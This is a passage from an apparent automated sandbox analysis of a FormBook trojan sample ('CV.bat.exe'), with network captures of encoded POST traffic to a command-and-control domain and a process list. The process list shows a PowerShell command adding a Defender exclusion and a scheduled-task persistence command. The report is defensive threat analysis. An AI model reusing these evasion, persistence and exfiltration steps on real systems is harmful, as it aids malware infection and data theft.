4b 7a 77 49 35 54 61 71 69 58 4c 38 76 75 6f 63 72 38 30 31 76 6a 79 37 6f 55 72 68 4e 32 57 78 4b 66 30 59 7a 6b 47 44 39 67 71 71 5f 44 77 46 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: WvMH=hQCvjyR4iH7W68T7TTbEjA2Ab23NlnghhsbiVffQdrJMUhFVAdF_dlaBnvAZgufES-BQp9fotAUgUf2fCVbbv-pw0xsUzN3ORG5Fiz8tehUQiHf39D1Ig9gX3Dt4dT2uNKzwI5TaqiXL8vuocr801vjy7oUrhN2WxKf0YzkGD9gqq_DwFA).
Oct 3, 2022 15:57:28.053888083 CEST	118	IN	HTTP/1.1 403 Forbidden date: Mon, 03 Oct 2022 13:57:28 GMT content-type: text/html transfer-encoding: chunked vary: Accept-Encoding server: NginX content-encoding: gzip connection: close Data Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49705	91.195.240.94	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 3, 2022 15:57:30.597460985 CEST	124	OUT	POST /redb/ HTTP/1.1 Host: www.yaignars.site Connection: close Content-Length: 5334 Cache-Control: no-cache Origin: http://www.yaignars.site User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.yaignars.site/redb/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 57 76 4d 48 3d 68 51 43 76 6a 79 52 34 69 48 37 57 37 63 6a 37 57 77 7a 45 6d 67 33 79 65 32 33 4e 28 58 67 74 68 73 58 69 56 63 54 41 64 65 52 4d 56 32 4a 56 41 5f 64 5f 66 6c 61 42 32 66 41 6a 74 4f 66 57 53 2d 56 6d 70 38 75 54 74 43 34 67 56 4e 7e 66 55 6c 62 61 67 2d 6f 58 31 78 73 54 73 64 33 4f 52 48 46 7a 69 33 6f 58 65 68 63 51 69 55 48 33 39 42 64 4c 68 74 67 53 34 6a 74 34 64 53 4b 68 4e 4b 7a 4b 49 35 37 4b 71 68 66 4c 7e 38 32 6f 65 36 38 31 38 66 6a 78 34 6f 55 34 74 6f 66 42 33 36 32 48 66 78 59 6c 55 61 6c 42 69 4d 62 36 5a 62 56 6c 6b 4c 47 31 59 38 61 56 33 42 66 47 6e 59 4a 73 34 52 62 57 6e 69 4a 31 44 74 34 4f 6d 61 41 32 71 6c 50 6d 79 57 42 74 45 65 79 67 6b 59 4a 6d 71 70 6c 66 55 51 55 30 49 5f 41 77 78 75 5a 41 76 59 61 36 65 76 62 31 64 46 49 65 50 33 63 6a 70 47 32 2d 31 30 76 53 33 2d 77 55 45 54 55 51 44 5f 68 57 55 65 79 49 45 56 53 79 38 76 4c 48 68 30 59 72 71 43 51 33 61 46 65 4a 4c 78 4f 78 4a 4a 38 64 57 78 65 57 37 37 39 55 65 63 58 68 4a 74 57 54 71 76 38 65 78 32 64 72 4b 63 44 2d 4e 66 6a 64 4c 78 51 35 67 73 6c 4b 58 69 31 4f 58 4b 51 53 6c 69 68 71 57 66 7a 76 4e 74 6f 51 6f 36 44 6c 43 51 41 6d 53 54 44 4b 68 43 4e 57 30 38 35 36 32 74 7e 54 55 57 42 6b 54 57 57 67 46 33 63 2d 47 4f 78 69 65 34 69 79 45 70 66 79 5a 64 38 64 39 31 69 63 65 63 33 4b 6c 42 74 4f 30 6d 32 66 31 42 68 56 6a 75 6e 71 58 67 31 2d 31 47 4c 35 65 30 6b 73 50 39 32 61 6c 69 69 36 4e 7a 42 6c 37 43 39 65 6c 4a 28 69 53 4b 68 4d 64 73 62 69 57 5a 75 4f 70 54 4c 4b 57 36 77 43 37 43 4d 4a 52 6c 69 64 7e 50 73 59 75 67 35 30 70 67 4e 35 34 52 5a 35 46 77 65 63 6c 4e 36 33 31 79 4d 6f 72 79 41 48 36 37 75 2d 6e 6c 38 41 78 51 34 38 31 61 56 61 68 47 71 53 6a 34 57 67 69 50 5a 66 74 74 55 6f 47 66 6f 4c 67 76 30 69 68 6b 57 51 4e 75 54 54 48 41 39 44 51 4f 59 37 32 73 6d 4e 74 61 68 35 39 45 70 48 7e 72 43 48 50 75 30 66 76 73 7e 69 61 43 30 32 62 6d 4f 78 31 43 69 47 61 4a 73 6c 6b 66 65 67 58 67 34 32 52 56 67 68 63 55 57 61 61 54 6f 54 52 55 37 64 58 77 47 37 50 32 76 75 4f 7a 58 57 37 6c 6e 66 4e 71 33 54 77 52 6b 56 65 41 47 2d 50 46 61 6b 6f 56 78 61 58 48 33 66 33 69 52 70 7e 77 4d 55 4e 32 4b 41 67 41 58 46 41 55 31 42 62 72 6b 76 4c 7a 63 52 55 38 67 55 7a 72 43 32 7a 70 77 37 6e 48 6e 73 67 67 73 58 6b 35 77 4c 4a 70 6d 50 32 53 64 33 5a 74 58 7a 4a 6e 52 78 34 55 70 4f 71 54 6d 74 64 6e 57 69 52 7a 4a 58 35 70 73 67 75 38 68 7a 62 71 6c 63 70 69 67 37 56 54 49 6e 6a 56 6f 69 66 59 66 46 67 52 37 61 31 71 63 2d 61 31 63 46 76 50 44 69 37 56 36 34 50 68 45 55 59 61 6c 46 72 37 6b 53 52 56 77 78 33 38 79 53 41 74 59 30 67 4b 79 4c 68 45 39 75 54 42 34 48 71 59 39 4b 61 64 51 46 7a 38 34 2d 57 39 52 4b 42 67 74 4b 37 2d 33 7a 41 6f 39 6f 6f 34 51 59 62 33 79 6a 6c 49 61 49 58 45 41 47 6f 63 6b 70 7e 35 79 33 63 79 39 4b 42 5a 57 38 4a 30 4a 69 66 6f 28 6d 76 6c 66 6b 51 52 7e 73 65 73 72 70 37 47 49 31 6c 6b 71 54 33 4e 51 50 51 6b 79 67 5a 62 72 4f 4c 53 6b 38 4c 57 49 61 6a 7a 6c 4c 4c 35 52 79 48 41 54 76 35 6d 73 49 5a 4a 37 56 34 39 34 68 55 58 50 4c 35 4a 33 67 51 4e 32 57 79 59 33 48 31 32 72 62 71 44 67 30 4e 6d 78 6d 7e 6e 31 68 5a 5a 4a 62 51 54 70 36 5a 46 75 36 4b 39 48 59 6d 51 75 38 30 39 73 4b 31 53 7a 38 48 59 38 6e 58 49 41 46 7e 4e 39 33 64 4e 33 39 49 67 42 39 68 4b 4c 31 4d 76 36 6c 54 64 66 75 56 4d 4e 6a 50 34 49 49 79 4a 51 51 42 66 6e 35 53 65 49 41 62 7a 72 61 42 65 6d 48 67 67 37 66 33 6b 34 5a 34 47 5a 54 52 42 43 31 43 33 6a 69 35 57 28 73 34 4f 51 65 51 69 6d 45 4c 6e 6f 44 55 76 69 4b 4d 4b 59 30 43 6c 78 47 57 52 68 47 50 47 63 4a 65 69 61 38 46 63 6b 51 41 4e 5a 4f 7e 4b 54 33 6d 48 31 50 7a 59 75 49 4b 58 4d 73 63 62 77 41 54 64 66 32 52 49 35 75 41 61 39 49 6f 67 66 48 49 6a 53 4b 59 43 28 58 41 6e 35 76 36 63 30 6e 4b 39 6d 71 5a 45 56 7a 54 38 65 6a 53 65 64 61 38 34 67 43 67 4b 78 44 73 45 66 43 4d 56 51 63 7e 41 76 4c 48 57 57 6a 61 64 32 52 66 49 35 52 41 32 47 33 4b 50 59 73 31 4b 63 77 62 4d 37 4f 57 6e 36 58 32 5a 52 4f 48 5a 4a 42 37 6c 77 4c 38 78 48 4f 58 47 45 51 39 7a 37 37 5a 4d 28 69 6c 6f 6c 44 4d 6c 45 58 65 6f 31 6e 64 32 6c 75 68 77 45 67 66 58 Data Ascii: WvMH=hQCvjyR4iH7W7cj7WwzEmg3ye23N(XgthsXiVcTAdeRMV2JVA_d_flaB2fAjtOfWS-Vmp8uTtC4gVN~fUlbag-oX1xsTsd3ORHFzi3oXehcQiUH39BdLhtgS4jt4dSKhNKzKI57KqhfL~82oe6818fjx4oU4tofB362HfxYlUalBiMb6ZbVlkLG1Y8aV3BfGnYJs4RbWniJ1Dt4OmaA2qlPmyWBtEeygkYJmqplfUQU0I_AwxuZAvYa6evb1dFIeP3cjpG2-10vS3-wUETUQD_hWUeyIEVSy8vLHh0YrqCQ3aFeJLxOxJJ8dWxeW779UecXhJtWTqv8ex2drKcD-NfjdLxQ5gslKXi1OXKQSlihqWfzvNtoQo6DlCQAmSTDKhCNW08562t~TUWBkTWWgF3c-GOxie4iyEpfyZd8d91icec3KlBtO0m2f1BhVjunqXg1-1GL5e0ksP92alii6NzBl7C9elJ(iSKhMdsbiWZuOpTLKW6wC7CMJRlid~PsYug50pgN54RZ5FweclN631yMoryAH67u-nl8AxQ481aVahGqSj4WgiPZfttUoGfoLgv0ihkWQNuTTHA9DQOY72smNtah59EpH~rCHPu0fvs~iaC02bmOx1CiGaJslkfegXg42RVghcUWaaToTRU7dXwG7P2vuOzXW7lnfNq3TwRkVeAG-PFakoVxaXH3f3iRp~wMUN2KAgAXFAU1BbrkvLzcRU8gUzrC2zpw7nHnsggsXk5wLJpmP2Sd3ZtXzJnRx4UpOqTmtdnWiRzJX5psgu8hzbqlcpig7VTInjVoifYfFgR7a1qc-a1cFvPDi7V64PhEUYalFr7kSRVwx38ySAtY0gKyLhE9uTB4HqY9KadQFz84-W9RKBgtK7-3zAo9oo4QYb3yjlIaIXEAGockp~5y3cy9KBZW8J0Jifo(mvlfkQR~sesrp7GI1lkqT3NQPQkygZbrOLSk8LWIajzlLL5RyHATv5msIZJ7V494hUXPL5J3gQN2WyY3H12rbqDg0Nmxm~n1hZZJbQTp6ZFu6K9HYmQu809sK1Sz8HY8nXIAF~N93dN39IgB9hKL1Mv6lTdfuVMNjP4IIyJQQBfn5SeIAbzraBemHgg7f3k4Z4GZTRBC1C3ji5W(s4OQeQimELnoDUviKMKY0ClxGWRhGPGcJeia8FckQANZO~KT3mH1PzYuIKXMscbwATdf2RI5uAa9IogfHIjSKYC(XAn5v6c0nK9mqZEVzT8ejSeda84gCgKxDsEfCMVQc~AvLHWWjad2RfI5RA2G3KPYs1KcwbM7OWn6X2ZROHZJB7lwL8xHOXGEQ9z77ZM(ilolDMlEXeo1nd2luhwEgfXn0M-OG2y0c~fpTgjtIGbjkwv8us0FJzi0t5O4EvdSR3p(-T7m91xSm1iDRnqixo270bAVhfvjua-uISwxiyzbi9Vbi1LBrv2UlbP3gyKvvSb~YYz(_36fIJmEl3Nc30FLrmn~A8nMsJtXvf-80N2aE9JPGrabBan5PrV8BHhKX8nWJvpJKQNt2BSFTs5Al(ERctjqfMaL3psTh4L9WyX2F6ZS8jGvEwfki1AKOmZK_Ll3G2kP8nXG5oXeVRcFDteTUWO(ZQRurF5N-qhIpXLrm4dGZeEEnKJtyF50sVwua5xuPtcwUt9iW9FwnCTm1MQIFdugJnIdtQ3~DYPPPwOItCBA0u6O4~k2z7km8rGmVpdFnbAO9poAy4fMis6svNBTcEDxKX1RcICiNxrh83rmXkqO945RXZn7vwVtdGn~eanoaRih1pENxtT0YtO4e1zbpBLtSBjUCxg0fHRYcCgPZOX1QSBQYs1Q3azuZ(v6HDk529caTpx9CeePbc_hJAVTntN3hiJtEwgSC9ecsfE5CK64-Tpgm6DsucsoNz_3A1qPvvi0nRI6Z6C57N_1Nckhb8cQcS853pIa8UonIOUZdq7o7UW3n84R4Tns_DQFB6o2OmeJ6k2chpqDl~wpNLZktA3oJaInPX0XJEUo3JqL6sxtBsRENI1sk13VBvdenFtmzuFVjMXAJO6Xhj8f_LcR-B26xMpVLas3WkdlAggC_DMyUJUTxUAb-kWg64IePqByI9u7G3EQw5hApZKzmS1Pa5c1ebPWXLYRDPI6axo~0J8EUADvggBqfbHEy92A309r1dRCGKMKa6n(0tl3-nVXSpNyOrdjY5_qHo44SLjSvKl~7vA59e6N2Di~ndKwy5cM14CpPWPY2MlM-LHYmR5ooaX0f4WMDyNXYkrKsrfoPSX5RfdHgGpFKDcIupaq1j6mlRkz-YdA2ZjYnSPLBIbTP8BhyB3cDiCqhQEv6gZXdannxDkbFoTtUAHtfKJifXxAc(HBR8BDBsVMCMC7iAF1QJGmMY7qWS5utmQMtrPxmciTssrB0(DbBBxkJVC4mkq71SKePRaU034S2(1sEuuhwaa02zRqzaNNo3ofAWQsAQA~XTZY3U6JJN_5tmGZYPCVvyC9o9JJcn65nPnmK9vpw88bgHrnk(Y8ehKTToAC8HAyYkGMXDdOLfinZZknrjkFR1BG6ZPoyEP4qsYWRha2aS844AsOTifHznpW8nll0ttqHTrmYcQKr614pfb6NqlyzpJ3ZpeMMaxTLKJQ8saWZM6TKUJ(kxaVyGauPRffXa11FvCyde-8xszjQGCqmPszHRyFeGU(0dYusj1GDl7y4aV88j_X22qAAruqHqnDDSYJANmBahbWy2FtBx-lsqKBdNducs5gls4(kfxNDLeRQLaOsI4FgnBEGQLxT75HyWts7TzGop31RweFZ6RkQw_VVh0lWFvZkKqcBxaQggql5g2JAbC~lfpgymAzus_e_xsFglHzA3Q0o661qDvG4aT4iHWzPguX6hBMRnidVD8iUIS9ZfEOYNbJM3kFePOLFgpWjeVf6l3rFZOEjqeCMiAMiWK~5vDvIYJmchOPduD88doKEiHljm2qat72t(61bZQaDip35NeEFo-v3fFJdJQXcDGJeVypkIWOcy7wShSlfL1BGlbSs1n(jniwyJgNvjMWcpBmDZ4PhSsn0qrfrLiADkoum0mOUFqlaBRng1jewYnCEIsb9wOsAPd~n6v2a(RlCpkftfbJ3qFqXAphB0HWH(iOv9x(aN8VZDmG9kgupxKggntITptEvkPOsGtFf6vmbZLkZiMbcYdg00925kN7i8XKTPtaq4x2Zx9AKjnKLIsGd56S6zq9aB8qVWS8_1_SnXuOffj63cOr3bnO5CHwnrbcjoKn4Rl6l2NmkVWjDZGj5qd2j7xlCAJ~kLxnpwKINOsA2Cthkiim-1cfr5Rz7lQUznATtxR8MSQj6eP0vXPlbMN29HbG5toGuFxSgWX45Vp3ZHbbkfQ1o5DBIZMEEDyD-e59e79Cymry74AQ1ylbiiZs1NX6Xw_WtzJZq0XxL1_aLRvpWLA7Na5tFeOuRMcugaDsFH0(XJNtVx2SNPREkZ3eOFNfGRl8eXiC3WJUr14lLjyPnibjTe2Fr3jU2ppdDBfbc8kuMODz_ByBKL3NGn8IeDugsjr(etT80s09nS4IYvUQ2khwW85lwW-e18xrID_v0lm326ENUViMCC1l7bNH0JjUxAeLdOfcUkPlP7ZGOwqLq77LNz-UF2t5pbTD3Z896fnaixUMys85f8dywoiwzWOZKakwRXXqO9gPIjPq2aZP5UggCPMGQdAqmKdfNm-nulKhUPG7n5aKLPG2dRzSMwN60XC~9o5rG~72yTylXGIsCYBmcURi9jhleh0GmkK2Pg3uOLLq0feuyrFuKYpO4flaxtmIeLBaoavIjXCI-z4jS0SSrNDeHECmE1huziJ9jmV3QWqYNO0Q6ZB(WIpCTJ83hBi1GA5u3UXiUspBA0o0-3-m4IH~eTrFqn-OO~iejVv3vVtQMlIpCln3iVnIbeuk5kXmj27D5sz~XigHrZrPCbbKQDYL_sxGSpZp-4EYXaFnj1f2W25gn9rHGsZ6PUA3ymrWD0_UYkvNRxYw6FHpn~vbgksVzwsRhXRV1fZjGkcf8IPCurlbpFetI40gLnfLkMlo1jUrZ~kq2wFJ-CoGA9
Oct 3, 2022 15:57:30.616703987 CEST	125	IN	HTTP/1.1 403 Forbidden date: Mon, 03 Oct 2022 13:57:30 GMT content-type: text/html transfer-encoding: chunked vary: Accept-Encoding server: NginX content-encoding: gzip connection: close Data Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49706	91.195.240.94	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 3, 2022 15:57:32.636440039 CEST	126	OUT	GET /redb/?SrNH_=ZbLl4nlXWVx&WvMH=sSqPgCldjkbi0+fTeRrTo1yeRkXijBFS3eCOWeLwWqlRfT02SfRof0res+4jmsjJUPdu+dXwzSVFQdySZWLfkZF8oXotr+qwUQ== HTTP/1.1 Host: www.yaignars.site Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 3, 2022 15:57:32.693151951 CEST	127	IN	HTTP/1.1 200 OK date: Mon, 03 Oct 2022 13:57:32 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding x-powered-by: PHP/8.1.9 expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_DNc5on43OHnGVS4ditvRZB7RSHdQuUQcDBHC8yKwg/0kAkdj4QFY9/C5VurcMo8s4/LO5foN7oDXqPsQU3hMcQ== last-modified: Mon, 03 Oct 2022 13:57:32 GMT x-cache-miss-from: parking-7f9f948885-4zk47 server: NginX connection: close Data Raw: 32 44 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 44 4e 63 35 6f 6e 34 33 4f 48 6e 47 56 53 34 64 69 74 76 52 5a 42 37 52 53 48 64 51 75 55 51 63 44 42 48 43 38 79 4b 77 67 2f 30 6b 41 6b 64 6a 34 51 46 59 39 2f 43 35 56 75 72 63 4d 6f 38 73 34 2f 4c 4f 35 66 6f 4e 37 6f 44 58 71 50 73 51 55 33 68 4d 63 51 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 79 61 69 67 6e 61 72 73 2e 73 69 74 65 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 49 6e 66 6f 72 6d 61 74 69 6f 6e 65 6e 20 7a 75 6d 20 54 68 65 6d 61 20 79 61 69 67 6e 61 72 73 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 79 61 69 67 6e 61 72 73 2e 73 69 74 65 20 69 73 74 20 64 69 65 20 62 65 73 74 65 20 51 75 65 6c 6c 65 20 66 c3 bc 72 20 61 6c 6c 65 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 65 6e 20 64 69 65 20 53 69 65 20 73 75 63 68 65 6e 2e 20 56 6f 6e 20 61 6c 6c 67 65 6d 65 69 6e 65 6e 20 54 68 65 6d 65 6e 20 62 69 73 20 68 69 6e 20 7a 75 Data Ascii: 2D0<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_DNc5on43OHnGVS4ditvRZB7RSHdQuUQcDBHC8yKwg/0kAkdj4QFY9/C5VurcMo8s4/LO5foN7oDXqPsQU3hMcQ==><head><meta charset="utf-8"><title>yaignars.site - Informationen zum Thema yaignars.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="yaignars.site ist die beste Quelle fr alle Informationen die Sie suchen. Von allgemeinen Themen bis hin zu

Target ID:	0
Start time:	15:55:23
Start date:	03/10/2022
Path:	C:\Users\user\Desktop\CV.bat.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\CV.bat.exe
Imagebase:	0x430000
File size:	885760 bytes
MD5 hash:	40372D67F0DE4526F04FBA7948F7FF02
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.302783902.0000000002836000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: powershell.exePID: 5156, Parent PID: 6056

General

Target ID:	1
Start time:	15:55:34
Start date:	03/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PzKpucfDtCCmww.exe
Imagebase:	0xa00000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Analysis Process: conhost.exePID: 5152, Parent PID: 5156

General

Target ID:	2
Start time:	15:55:35
Start date:	03/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: schtasks.exePID: 5148, Parent PID: 6056

General

Target ID:	3
Start time:	15:55:35
Start date:	03/10/2022
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PzKpucfDtCCmww" /XML "C:\Users\user\AppData\Local\Temp\tmpE00F.tmp
Imagebase:	0x1a0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exePID: 5908, Parent PID: 5148

General

Target ID:	5
Start time:	15:55:35
Start date:	03/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: CV.bat.exePID: 5060, Parent PID: 6056

General

Target ID:	8
Start time:	15:55:42
Start date:	03/10/2022
Path:	C:\Users\user\Desktop\CV.bat.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\CV.bat.exe
Imagebase:	0x780000
File size:	885760 bytes
MD5 hash:	40372D67F0DE4526F04FBA7948F7FF02
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.418181649.0000000000DE0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Analysis Process: explorer.exePID: 3452, Parent PID: 5060

General

Target ID:	13
Start time:	15:55:46
Start date:	03/10/2022
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff69fe90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000000.380716158.00000000109CA000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000000.380716158.00000000109CA000.00000040.00000001.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000000.380716158.00000000109CA000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000000.380716158.00000000109CA000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Analysis Process: chkdsk.exePID: 1264, Parent PID: 3452

General

Target ID:	17
Start time:	15:56:34
Start date:	03/10/2022
Path:	C:\Windows\SysWOW64\chkdsk.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\chkdsk.exe
Imagebase:	0x1200000
File size:	23040 bytes
MD5 hash:	2D5A2497CB57C374B3AE3080FF9186FB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.528027356.0000000005380000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.528027356.0000000005380000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.528027356.0000000005380000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.528027356.0000000005380000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.527385470.0000000005350000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.527385470.0000000005350000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.527385470.0000000005350000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.527385470.0000000005350000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.522661279.0000000000D90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.522661279.0000000000D90000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.522661279.0000000000D90000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.522661279.0000000000D90000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Disassembly

⊘No disassembly

